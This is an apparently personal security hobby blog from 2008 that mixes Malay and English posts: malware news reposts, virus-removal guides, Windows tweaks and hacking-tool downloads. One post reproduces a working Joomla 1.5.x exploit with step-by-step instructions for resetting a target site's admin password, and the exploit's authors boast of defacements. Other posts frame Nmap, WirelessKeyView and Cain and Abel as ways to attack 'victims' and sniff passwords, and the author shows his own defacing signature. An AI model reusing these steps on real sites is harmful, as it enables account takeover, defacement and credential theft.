Thursday, December 18, 2008

Check virus secara percuma secara online

Kalini nak post gune bahase melayu plak.. Kalau ade antara kita yg terjumpa file .exe pastu takut2 nak run, kebetulan antivirus plak tak penah udate, inilah caranya nak tau file tu merbahaya or tak..

Kalau anda dah tau atau belum, kat internet tu ade satu web site http://www.virustotal.com menjalankan servis untuk menganalisa file-file yg disyaki dan juga menyediakan report yg lengkap dan cepat!! Dengar macam hebat dan memang hebat.. Website ni boleh mengesan virus, worms, trojans, dan segala jenis malware yg boleh dikesan antivirus. (sebab antivirus ni kdang2, jname laen dah detect, die tak detect lagi).. jadi, klau gune website ni, kite leh tau la file tu dah penah di detect oleh antivirus ape saje yg ade kat dunia ni.. klau takde, maknenye file tu selamat...

Menurut website die, virustotal ni:

* Free (tu yg sedap dgr tu)
* Gune pelbagai enjin antivirus
* Virus signature yang paling latest giler.
* Result yg detail bagi setiap antivirus.
* Statistik terkini.


dah sudah merapu, mari kite belajar gune.. tapi cam tkyah ajar sbb cam senang je gune.. tapi tulis jela bagi pnjang sket post kali ni.. lagipun, tak best plak asyik copy paste, tulis sendiri pus sket.. hehe..

1. snang je nak gune.. mule2 bukak je laman web http://www.virustotal.com dan kalau malas nak taip, klik je link tu..

2. Pastu akan kuar page camni..




3. Pastu apa lagi.. kita ramai-ramai klik butang browse dan pilih file yg kita ragui tadi.. pastu klik butang send file.. tu je.. pastu tunngu result.. senang bukan? Tapi perasan tak kat bawah textfield tu ade thickbox cakap "send over SSL", itu function untuk user yg ade masalah nak upload care biase.. macam saye penah kena, mase tu nak upload file kat kampus.. dah name pon file virus, firewall block untuk upload, jadi gune la sendover ssl tu.. dan berjaya upload..

4. Result die rupe camni..


dan ini..


amacam.. seronok tak.. jumpe lagii.. selamat mencuba..

assalamualaikum..

Google sponsored links caught punting malware

Researchers from Websense have caught Google carrying ads punting rogue software that secretly installs malware on the PCs of its users.

Recent Google searches for Winrar turned up sponsored links that offer a "spyware free" copy of the widely used data-compression application. Google users unfortunate enough to download and install that software are soon exposed to a program that makes changes to their PC's hosts file. From then on, every time the users try to visit Google, Yahoo, and other popular sites, they are instead sent to an impostor site under the control of the attackers.

The operation is another testament to the resourcefulness of those running rogue software scams. Rather than relying on zero-day vulnerabilities or hard-to-execute website hijackings, they often find it easier to snare their victims through legitimate ads placed on Google or elsewhere.

"This raises some questions," Websense researcher Elad Sharf writes. "Is this problem Google's fault for not checking whether advertised links actually serve malware? Is it the miseducated user's fault for getting infected?"

Probably a little of both, but are we the only ones who find it ironic that Google's own anti-malware initiative imposes draconian punishments on smaller websites when they're caught doing the same thing? Websense, which first witnessed the scam last week, said the malicious Google links were still available when it posted this report on Sunday.

A Google spokesman said the company is in the process of removing the offending sites from its ad network. "Google is committed to ensuring the safety and security of our users and our advertisers," he said.

As a recent complaint filed by Federal Trade Commission shows, purveyors of rogue anti-virus and other software spend millions of dollars per year advertising their wares on legitimate sites - and go to great lengths to conceal their behavior. No doubt, Google isn't the only advertiser to be tricked into running malevolent ads, but as the do-no-evil company that's steam-rolling its competition in the ad industry, it's hard to believe these kind of links are still being sponsored.

Resource: http://www.theregister.co.uk/2008/12/16/google_sponsored_links/

Wednesday, December 17, 2008

Microsoft issues emergency patch warning for IE

Microsoft will push out an emergency security patch for Internet Explorer on Wednesday, addressing a critical security hole currently being exploited in the wild.

Redmond issued advanced notice for tomorrow's fix, describing the out-of-cycle patch as protection from "remote code execution."

Unscheduled updates are pretty rare for Microsoft, stressing the potentially serious nature of the flaw. Although the last time Microsoft broke it's update cycle was in late October – it was the first time it had done so in about 18 months.

The latest zero-day vulnerability stems from data binding bugs that allows hackers access to a computer's memory space, allowing attackers to remotely execute malicious code as IE crashes, Microsoft has said.

Although the exploit was at first contained to warez and porn sites hosted on a variety of Chinese domains, the malicious JavaScript code has since spread to more trusted sites though SQL injection. The flaw is primarily being used to steal video game passwords at present, but could potentially be used to retrieve more critical sensitive data from users as well.

The vulnerability is specifically targeted at surfers running IE 7, but it's also known to affect versions 5, 6, and 8 of the browser as well. All IE users are advised to install the update.

Microsoft's emergency patch will become available Wednesday at 1 PM EST from auto-update and the Microsoft Download Center. A separate patch will be made available for those running IE8 Beta 2.

Resource: http://www.theregister.co.uk

Tuesday, December 16, 2008

McColo Shutdown Lead to Malware Threat Reduction in November

Internet security firm Fortinet said that the online threats and spam level dropped significantly in the month of November 2008. The downward trend continued since September 2008 when both online threats and spam were at their peak.

According to the "November Threatscape Report" released by Fortinet, the slowdown in unsolicited e-mails and spam is not likely to continue for long and may reverse in the month of December 2008. The downward trend was initiated with the closure of ISP McColo, the biggest trend determiner. But once the malicious attackers find new replacements to host their spambots and sites, the number will increase again.

Moreover, security experts said that another reason for downfall in the number of spam and online threats during November 2008 was attackers were might busy in building and planning new attacks to launch during the holiday season when large number of people come online to shop. This planning will help in making a large number of unsuspecting users their victims.

Derek Manky, Project Manager, Fortinet, stated that spam and malware activities are expected to rise at a fast pace as the spam botnets find new hosts after closure of McColo, as reported by Security Watch on December 4, 2008. He further added that with the starting of new online shopping season, key-logging activities are likely to escalate. The upward trend has already come into the notice since the closing of November 2008.

The report also disclosed that out of 81 vulnerabilities detected in the month of November 2008, 25 were classified into high risk category. Among those 25 vulnerabilities, the top were Worm.Slammer and Trojan.Storm.Worm.Krackin.Detection, which together represented 60% of the total vulnerabilities.

Moreover, giving more details on keyloggers, Fortinet revealed that out of top five malware variants encountered in November 2008, three belonged to the family of Goldun. This family is mainly designed to track users' keystrokes which are used to steal their personal and financial details such as credit card and banking details.

The security firm further said that rising key-logging activities indicates to the preparations for online shopping during the holiday season.

Resource: http://www.spamfighter.com



Phishing Attacks Increased Alarmingly by 240%

The security firm Websense unveiled that out of every 50 e-mails, three are phishing e-mails sent by scammers, representing a month-on-month rise of 240%, or accounting for about 83% of all sent mails.

Websense observed that 90.5% of spam e-mails were containing an URL, a percentage that has never been seen earlier. Security experts justified this fact by stating that in recent times, scammers have started to deploy more sophisticated techniques to exploit the current financial crisis.

The security experts further stated that once again it is the work of a key gang of phishers that has led to this significant increase in the level of phishing attacks. Majority of the criminals use the phising kits, including a typical subdirectory dubbed "rock", designed to attract the unaware users towards the bogus websites. But once the phishing filters started seeking the word, the gang put an end to this technique.

The analysis also revealed that scammers are constantly pushing in various sophisticated packages of malicious codes, including "blended threats" that makes use of the phony images and links. These malicious contents can get installed secretly onto the victim's PC.

Further, the criminals have launched a phishing technique where an incomplete form is also able to reveal the sensitive data of the user, even if a user sends back the form to the fake website by filling in bogus details.

Earlier in August 2008, SecureWorks researcher Joe Stewart revealed the way in which an incomplete form, sent back to a site hosting Asprox botnet, resulted into further exploits of the user's browser.

Such attacks could be detected and restricted only with the help of professional expertise. They also warned the firms which are comprehensively dependent upon the internal security measures.

Moreover, the attacks are very devastating and highly sophisticated. So in lack of a strongly responding security solution, customers may witness storage capacity and bandwidth problems, slowdown in productivity, and exploitation of sensitive information.

Furthermore, a research by SANS Internet Security Centre shows that a well-designed phishing e-mail can attain a click-through rate of around 10% while that of a targeted one can exceed 80%.

Resource: http://www.spamfighter.com/

Monday, December 15, 2008

Renungan Bersama

Rasulullah SAW bersabda : ".. Allah SWT telah berfirman: Aku adalah Allah. Tiada Tuhan selain Aku. Akulah Tuan dan Raja segala Raja. Aku memegang hati-hati raja di dalam tanganKu. Bila orang ramai (rakyat) mentaatiKu, Aku akan menukar hati raja-raja menjadi kasihan belas serta sayang ke atas mereka. Bila orang ramai (rakyat) mengingkariKu, Aku akan mengarahkan hati raja-raja ke arah kemarahan dan dendam ke atas mereka. Dengan demikian raja-raja akan meletakkan mereka dalam kesusahan dan penderitaan. Maka daripada kamu mengutuk mereka (pemimpin yang zalim), adalah lebih baik kembali mengingatiKu dan merayu kepadaKu supaya Aku melindungimu daripada kekejaman mereka."


Chinese researchers inadvertently release IE7 exploit code

Chinese security researchers have admitted that they inadvertently released code that might be misused to exploit an unpatched Internet Explorer 7 vulnerability.

Scripts to pull off the trick were already on sale in underground forums before the inadvertent release. Even so, anything that increases the likelihood of digital delinquents getting their hands on the exploit is unwelcome.

VeriSign's iDefense security division reports that attack code was up for sale at prices of up to $15,000 through underground forums. Prices are likely to slide following the escape of assault code from labs run by KnownSec.

Security tools firm eEye reckons the flaw has been the target of exploitation since 15 November.

According to iDefense, KnownSec made the code available after failing to realise that last Tuesday's Microsoft bulletins failed to fix the underlying vulnerability behind the bug, which revolves around IE7's handling of malformed XML tags. A explanation of what happened by KnownSec (in Mandarin) can be found here.

The flaw affects XP and Vista users, and creates a means to load Trojans or other forms of malware onto even fully patched Windows boxes simply by tricking surfers into visiting maliciously constructed websites. Thus far the attack method has been restricted to delivering game password stealers, the Internet Storm Centre reports.

Microsoft is investigating reports of attacks and considering its options. The timing of the attack in the run up to the holiday period and just after a bumper batch of eight bulletins suggests an out of sequence patch might be on order before the next scheduled Patch Tuesday, on 13 January. ®

Firefox plug-in Trojan harvests logins

Virus writers have latched onto the popularity of Firefox with a new variant on the established practice of stealing online banking passwords.

A password pinching Trojan that poses as a Firefox Plugin is doing the rounds, Romanian security firm BitDefender warns. ChromeInject-A is typically downloaded onto Windows PCs already compromised by other strains of malware.

Once installed, the Trojan sits in Firefox’s Plugin folder, activating every time the popular browser is started. The backdoor code looks for data exchanged between a compromised machine and a list of pre-programmed banking sites in Europe, Australia and the US.

Harvested login credentials are captured and subsequently posted to a server located in Russia.

More details on the bank sites targeted, along with the general behaviour of the Trojan, can be found in a write-up by BitDefender here.

BitDefender reports that incidents of the malware are “very low”, so the attack is more notable for its novelty than its potency. Malware that capitalises on the popularity of Firefox is rare, but not unprecedented.

Two years ago a spyware package that masqueraded as an extension to the Firefox web browser was spotted on the net. Like ChromeInject-A, FormSpy failed to do much harm.

Source: http://www.theregister.co.uk/2008/12/04/firefox_plug_in_trojan/

Sunday, September 7, 2008

Joomla 1.5.x Remote Admin Password Change


#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} // Get the model $model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2} { $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} // Verify the token if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

full info: http://www.milw0rm.com/exploits/6234

Friday, May 30, 2008

How to remove Flash.10.exe and Macromedia.10.exe virus

This is quite a lame virus but anyway still many computers still infected with this virus. So I will write a tutorial to help people to remove this pest.

Characteristics

As usual, this virus will disable your Registry editor, search and folder option because to keep it hidden. But, this virus will not disable your task manager. Why? Because this is a trap. When you open your task manager and found flash10.exe in the process list, dont end the process yet because by doing it, your computer will shutdown.So what we need to do is just following this step.




Step 1 - Enable registry editor and folder option

Download Washer here. Enable back your registry editor and folder options by using washer.


- If the virus attacked your computer, there will be a check at the Disable Regedit, Hide Find and Hide Folder Option check button.
- Leave the check button and straightaway click the repair registry button and in just a few second, you can access back your registry, search and folder options.
- If this doesn't work, try it again or ask someone to help you.



Step 2 - Remove the virus link in registry

First open the registry editor by Start > Run and type regedit and press enter. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentUser\Run and delete the WindowsMSN key at the right hand-side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\ and delete the C:\WINDOWS\system32\Flash.10.exe key at right hand side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\
CurrentVersion\Windows\
and delete the load key at the right.

Then, go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\
Software\Microsoft\Windows\ShellNoRoam\MUICache

and delete the C:\WINDOWS\system32\Flash.10.exe

and last go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\
Software
\Microsoft\WindowsNT\CurrentVersion\Windows\
and delete load key.

If your are tired to find the key, just press F3 and typed flash.10 and press again F3 to keep search.

After that, restart your computer.


Step 3 - delete the virus file

After restart your computer, make sure the virus is not run anymore. Open your task manager and if Flash.10 and Macromedia.10 is not in the process list, it is safe for you to delete the virus file. If not, repeat step 2.

Before delete the virus, you need to configure your Folder Options first. Open My Computer, click Tools menu and choose Folder Options. If Folder Options did not appear, repeat step 1.

Now Change the setting as my folder options on the picture below. Changes are on Show hidden file, Hide protected operating system file and Hide extension for known files. Click Ok.



Go to C:\Program Files\Common Files\Microsoft Shared\ and delete Macromedia.10.exe

Now, open C:\Program Files\Common Files\Microsoft Shared\DAO\ and delete file MSN.msn. The virus try to spoof by using MSN logo and name.

Then, go to C:\WINDOWS\System32\ . Right Click, choose Arrange Icon By > Modified. Then scroll to the last row and try to find Flash.10.exe, cmd.com, dxdiag.com, JambanMu.com, msconfig.com, ping.com and regedit.com. Delete the file. Remember, just delete the listed file only!!

Then, delete the virus in your USB drive by referring here. Delete only Flash Jokes.exe, Autorun.inf, Flash.10.Setup.exe and Scanner.exe

Now restart your computer. Hopefully your computer will be okay.


...Read more

Friday, May 2, 2008

Saje-saje memoyo


This one of my defacing signature.

announcement!!

I received many comment on a file that i'd uploaded named Washer,that had been infected by virus named virutQ. I have no idea how the virus infect my file but I'd studied the problems and got the solutions. Now I uploaded new Washer that free from virus. Thanks for your comment and thanks for supporting my blog and hopefully still support me. This is the new link. If any problems, please let me know. I just want to help people to solve their problems. Thank you. http://www.humyo.com/F/722217-137064809

Sunday, April 27, 2008

Saturday, April 26, 2008

Change Explorer Background Image

This a simple manipulation of regestry for changing explorer background image.

1. Create your own image in photoshop with you own size. I prefer 785x86 pixel and save with .bmp for example back.bmp.






This is my example.

2. Then open registry editor: Start > Run > Regedit.exe
3. Open HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Toolbar.
4. Add new string by right click and named it BackBitmapShell.
5. Double click the key and enter the full path of your bitmap image. Click OK.
6. Close registry editor and open my computer. Walla!.

Wednesday, April 23, 2008

Bad day

Today, i'm surfing websites. Suddenly appear a message that told me, updates for my free AVG antispyware were completed. I thought it was same as everytime i'm update, but today is different. After the message, i heard a sound and i realize that my profile are fully deleted. There are no more Quick Luanch toolbar, no shorcut in my desktop, and no profile for my Mozilla Firefox. Very bad day because i really forget to save my profile and my restore was turned off. That a big lesson for me to always update my profile.

Sunday, April 20, 2008

My Latest Wallpaper

How to insert things in context menu

Open your Registry Editor by start>run and type regedit.. then, go to HKEY_CLASSES_ROOT\*\Shell\ .

Create a new key by right clicking it. And rename it for whatever you want for example notepad. On the right hand side, double click the default and put on the value, what you want it to appear, example "open with notepad".

And then create new key under the previous key and name it command. Change tha default value to the link to your file for eg: C:\WINDOWS\System32\Notepad.exe and dont forget to add %1 at the end to ensure this is appear only on the supported file only. So it becomes C:\WINDOWS\System32\Notepad.exe %1.



Easy way to rename recycle bin

Many people having problems to rename their recycle bin to whatever name they want it to be. So I provide a simple tutorial on how to do it..

Open up your text editor or notepad and copy the following text into a new file:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

and now this file as whatever name you want but must end with .reg, eg: rename bin.reg.. save the file and double click the saved file and press yes if prompted a message box. Then, you can rename the recycle bin by right click>rename or directly press F2 when highlight the recycle bin..

Change Background of the folder

As Windows XP Home/Pro was released, many have realized that Microsoft had removed our ability to change wallpaper of our folders! Shortly after we realized the trouble on our machines, we got to work on a solution. We’ve found that Microsoft™ did not remove the ability to change the background and text color but instead hide the interface.

Now, it is somewhat simple for anyone to add wallpaper to a Windows XP folder.


1) Open notepad

2) Type in the text below
[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00FFFFFF

3) Save file as desktop.ini
Save as type : All Files

4) Copy the desktop.ini file you just created, and
paste into the folder you want the background to
be change

5) Go to START --> RUN..

6) Type Attrib s "C:\Location of your folder"
Click OK

7) Open your folder and the picture should be set by now.

Tuesday, April 1, 2008

mY Latest Poster

"sometimes you're always want to be.."

Thursday, March 27, 2008

Boost the speed of your Adobe Reader 8.0

To boost your adobe acrobat reader 8.0, open the Adobe Reader 8.0 directory at:

C:\Program Files\Adobe\Reader 8.0\Reader

There you will see Optional and Plug-ins folder. Open the Plug-ins folder, then cut all the files and folders inside and paste it at Optional folder.

Good Luck.

Wednesday, February 13, 2008

Peacefull Sunset


Time to feel that you're not always win

Saturday, February 2, 2008

Virus Washer Guide

I always talk about a tool named Washer in my previous post, but I never tell how to use it. And today I'll briefly tell you how to use it. Lets start with the first function.

Ultimate Washer is able to detects worms / viruses on your computer, with configuration to detects polymorphic worms

Ultimate Washer will searche for TRUE duplicate files using byte comparation method ensuring high level accuracy that you can configure manually in the range between 95% - 100%.


STOP wasting your hard drive space of duplicate files in multiple paths. Ultimate Washer let you find duplicate in Hard drive, Floopy disk, Flash disk, CDROM, DVD, Network drives, etc.

Ultimate washer can be used widely on many condition and you can also use this software to remove almost all worms in your computer easily. And you can tweak your computer's settings in a single click. Credited: www.softpedia.com

Scan

This is the function for scanning sample file and detect whether there is any file with the same signature with the file. First we need to load the sample file, for example we are loading virusmawar.js and the software will search throughout our pc for the similar file and we can directly delete the files. We also can choose which drive we want to scan by roll over Drives label.

Startup

This function will list down all software that automatically run everytime you boot your computer. Usually virus will make this as one of their objectives (make the virus run every boot). But this tools did not provide deletion on these keys but you need to manually open your registry and delete the keys if it is suspicious.






Registry

This part will thick the registry that has been changed by a virus, for example, if your task manager is disabled by the virus, the Disable Task Manager will right. You just click the Repair Registry button and your registry will be back to normal.

Processes


This is the part where it has the same functionality with the Task Manager provided by Windows. But if your task manager is disabled by virus, it is the alternative ways.

Thats all the functionality.Thanks to mr cool_entarto for creating such a nice tools.

Now i removed the infected washer and replaced it with new one.. thanks for comments.. washer download

Friday, February 1, 2008

i Phone

The iPhone is a multimedia, Internet-enabled mobile phone designed and marketed by Apple Inc. It has a multi-touch screen with virtual keyboard and buttons. The iPhone's functions include those of a camera phone and a portable media player ("iPod"), in addition to text messaging and visual voicemail. It also offers Internet services including e-mail, web browsing, and local Wi-Fi connectivity. It is a quad-band mobile phone that uses the GSM standard, and hence has international capability. It supports the Enhanced Data Rates for GSM Evolution (EDGE) data technology.

Following the success of iPod, Apple announced the iPhone in January 2007. The announcement was p speculations that circulated for several months. The iPhone was introduced, first in the United States on June 29, 2007 with much media frenzy and then in the United Kingdom, Germany areceded by rumors andnd France in November 2007. It was named Time magazine's Invention of the Year in 2007. A new version of Apple's iPhone is expected to be introduced in 2008 that is capable of operating on faster 3G cellular networks.
-Info from www.wikipedia.org

Wednesday, January 30, 2008

Peaceful helpful

What a harmony world of animal. Helps each other without knowing each other. But we human even we know each other still exist someone who take advantage of others.

[e-book] Professional Lamp - Linux, Apache, Mysql, & Php5 Web Development

This book will teach you from the basic about PHP and Apache also MySQL. I really enjoy these books.(download)

How to remove virus from USB drive

The most popular media to spread virus is USB drive and it is faster to spread virus and very effective. But do you know, if you know how to remove the virus in your USB drive, you can save not even your computer but the whole organization. What is the most important thing is at the moment you open your USB drive.

Opening USB

Usually we always just double click the USB drive but after this you need to open it using adress bar. Address bar is on the top of your window at about 1.5 cm from the title bar. But if there is no address bar, you can enable it by click view> toolbars> address bar. By opening your USB drive using this way, you can prevent the virus from autorun.

After you open your USB drive, you need to enable hidden and super hidden file. To do this, click on Tools> Folder Options.
Click on view tab and scroll down and thick on Show Hidden Files and Folders radio button and uncheck the Hide protected operating systems and Hide extensions for known file type. After that click apply. After this step you will see all the hidden and super hidden in your computer but remember, don't remove blindly files in other drive because some of it is important systems file.

After that, if your drive is infected, you can see a file named autorun.inf. Double click the file to know what the virus file. In my USB drive the files contain:

[autorun]
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
shell = Explore
The suspected virus is VirusMawar.js and find the virus in you USB drive and hightlight the virus file and press shift+delete to permanently remove the file. Now you can be a hero. :) Hopefully you enjoy this tutorial.

Tuesday, January 29, 2008

Turn-upside-down-around

"The pusing-pusing is pening"

How to change "start" button text

This tutorial is a very good way to show off to your friends about how powerful you are. But this is just a basic Windows Hacking. First you need this tools:

ResHack (download)

ResHack

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.
- http://www.angusj.com/resourcehacker/


Next Step

After that, run your ResHack and open for Explorer.exe file located in C:/WINDOWS/ folder. Please bear in mind to backup this file on another folder before for safety purpose because this file is a systems file. After you open the file, there will be some folder appears. Open folder String Table and open number 37 and click the 1033. You will see at the left hand side some text and one of the is "start". Just Change the start text into any text that you want. Just as simple as a,b,c. After that just save your file and restart the computer. This software will automatically create a backup file but it is more secure if you made it before start this changes. Thank you.

CamStudio 2.0

CamStudio 2.0 is a free screen recording software where it is very user friendly. It is able to record all your movement in your screen and very useful for you to make your presentation or demonstration effectively with visual. Usually hackers use this software to make video tutorial. It can output to AVI or swf depend on your setting. For teacher, they can use this software to give their student more understandings. What I can say about this software is it is very powerful and very user friendly.

Download
Password: example010

Monday, January 28, 2008

New Virus Alert!!!

Please everybody be alert on a virus that attached on e-mail with name "Life is beautiful.pps". Please don't ever download or execute the file. The symptom is when you first click on the file, there will be a message sound "Now it is too late, your life is nolonger beautiful". At that moment you are really too late. All your data, software, programs and so on will be settled down. Please be alert again. The virus also will send your private data to the creator of this virus. So please be alert and dont click virus with this attachment.Thank you for reading this post.

Sunday, January 27, 2008

Colourful World

"Colors is beautiful but sometime its annoying"

How to Change the Internet Explorer Window Title

I always see people with problem that their internet explorer have an annoying IE title such as "hacked by pokemon", "Virus Mawar Mengganas" or "Virus Mawar SEDANG MENGGANAS " and so on. So I think we need to know how to repair this.

First open your registry editor (previous tutorial). If you have problem opening registry editor, you need to refer to the previous tutorial. Then open HKEY_CURRENT_USER, the SOFTWARE > Microsoft > Windows > Internet Explorer > main.. Scroll down your right side and find Window Title. Delete the key by right clicking the key and choose delete or straightaway press the delete key when highlighting the key. After that, reopen your Internet Explorer.

By using this tutorial, you can also customize your IE title bar by changing the Window Title key..

Thanks.

Saturday, January 26, 2008

Nmap 4.53

Network Mapper or NMap is an open source network security tools that can be downloaded from www.insecure.org. This hacking tools is very commonly used by hackers and network admin all over the world even in Matrix film. If you are using nmap on Windows platform, you need to install WinpCap first. It is command base tools and now also available in Interface base but I prefer using the command base for more accurate result. The latest version is version 4.53. This tools usually used at the first step for gaining open port of the victims system. After gaining the open port, we can easily choose the suitable exploits for attacking the victims. The full explanation about nmap can be retrieve at their websites

Download (command line)
Download (GUI)

Illusion Pics

"This world full of illusion."

Wireless Key View [Request]


WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard. But with this tools you need to physically access the victims computer or other alternative is Wireless Hacking

Download

How to remove virus mawar.js

Yawn.. This virus is truly Malaysian virus.. We can know all the source code for this virus easily.. Just open with notepad and we can know everything.. and the best part is we can edit and make it ours. How about we learn how to remove this virus. This virus disable your Task Manager, Registry Editor and also Folder Options. How to enabled it back? First download Washer.
This powerful tool help us to enable back the thing that the virus disabled. Made by cool_entarto@yahoo.com, this tools also very helpful to terminate process whenever you cant use task manager. It repairs registry such as enable back Registry Editor and Folder Options.
How To Use

- If the virus attacked your computer, there will be a check at the Disable Regedit, Disable Folder Option and Disable check button.
- Leave the check and straightaway click the repair registry button and in just a few second, you can access back your registry, task manager and folder options.
- If this doesn't work, try it again or ask someone to help you.


Pastu?

After that open your task manager by hitting "Ctrl+Alt+Delete" on your keyboard. Choose "Process" tab. And wow.. a full list of process!! Be careful and find "wscript.exe" in the list, choose it and click End Process button. At this time you have stop the virus. But bear in mind that the virus is still enable back when you restart.

The solution is

Click start button and choose run. Type "regedit" and hit enter. Wow.. list again.. :( Dont worry, just open the HKEY_LOCAL_MACHINE then SOFTWARE then Microsoft then Windows, CurrentVersion and Run. Look at the right hand side. There will be a VirusMawar. Just delete the VirusMawar. Now you had prevent it from start everytime your computer restart.

Find the virus.

This is the final part. Open Folder Options (Control Panel>Folder Options). Change the setting as my folder options on the picture below. Changes are on Show hidden file, Hide protected operating system file and Hide extension for known files
Happy Ending

- Open My Computer>C:/WINDOWS find VirusMawar.js and delete it.

- Open My Computer> C:/WINDOWS/System32/ find VirusMawar.js and delete it.

Finish.. Have a nice holiday..
Please review other post in this blog.



Related links:

For download any software that you want, click Join 4Shared Now!

Offer!!















I'm in a very good mood. Anybody who wants to know about any software and wants me to find it, just request me and I will upload it for you..

Winpcap 4.0.2

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture. WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API. (more)

Download 1
Download2 (zip)

Cain and Abel













This is the powerful sniffing and cracking tools for Windows platform. You can even sniff all password within your subnet network. (more)

Download 1
Download 2 (zip)

Friday, January 25, 2008

Finally Published

After a few month, finally i have time to create my own blog.. thanks time and technology